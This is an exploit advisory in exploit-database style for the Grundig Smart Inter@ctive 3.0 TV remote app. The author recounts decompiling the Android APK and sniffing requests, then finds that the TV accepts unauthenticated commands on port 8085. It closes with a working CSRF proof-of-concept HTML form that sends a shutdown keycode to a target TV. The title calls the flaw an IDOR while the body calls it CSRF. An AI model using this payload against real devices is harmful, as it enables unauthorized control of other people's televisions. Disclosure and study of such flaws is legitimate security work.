Grundig Smart Inter@ctive 3.0 Insecure Direct Object Reference

`# Exploit Title: Grundig Smart Remote App CSRF  
# Google Dork: Local Vulnerability  
# Date: 06.07.2018  
# Exploit Author: Ahmethan GALTEKAdegN ~ @inject0r16  
# Vendor Homepage: https://www.grundig.com/  
# Software Link: https://play.google.com/store/apps/details?id=arcelik.  
android.grundig.remote  
# Version: Grundig Smart Inter@ctive 3.0  
# Tested on: Windows 7-8-10  
# CVE : none  
  
Hello! I'm trying my TV.I saw a Grundig remote control application on  
Google Play.  
Computer I downloaded and decompiled APK. And I began to examine individual  
classes.  
I noticed in a class that a request was sent during operations on the  
command line.  
I downloaded the phone packet viewer and opened the control application and  
made some operations.  
And I saw that there was such a request;  
  
GET /sendrcpackage?keyid=-2547&keysymbol=-4078 HTTP/1.1  
  
I noticed that each process has an id value. Then I turned off the  
television using the control application and noted the outgoing IDs.  
The only requirement for the connection between the TV and the application  
was to have the same IP address.  
After I made the IP address on the TV and the phone and the IP address on  
the computer the same: I accessed the interface from the 8085 port.  
Now I could do anything from the computer :)  
  
CSRF POC :  
  
<html>  
<head>  
<title>Grundig TV PoC</title>  
</head>  
<body>  
<h1>Grundig Inter@ctive 3 Shutdown PoC</h1>  
<form method="POST" action="http://TargetIP:8085/sendrcpackage?keyid=-2544&  
keysymbol=-4081  
<http://targetip:8085/sendrcpackage?keyid=-2544&keysymbol=-4081>">  
<input type="submit" value="Go!">  
</form>  
</body>  
</html>  
  
this poc will turn off the television when it is running. :)  
  
video about vulnerability;  
https://youtu.be/H7WYTkgtwsY  
  
  
#MoreThanYouImagine! ~ ahmeth4n.org  
  
greetz : @SmashTheKernel , @t3beq , @c_c0re  
`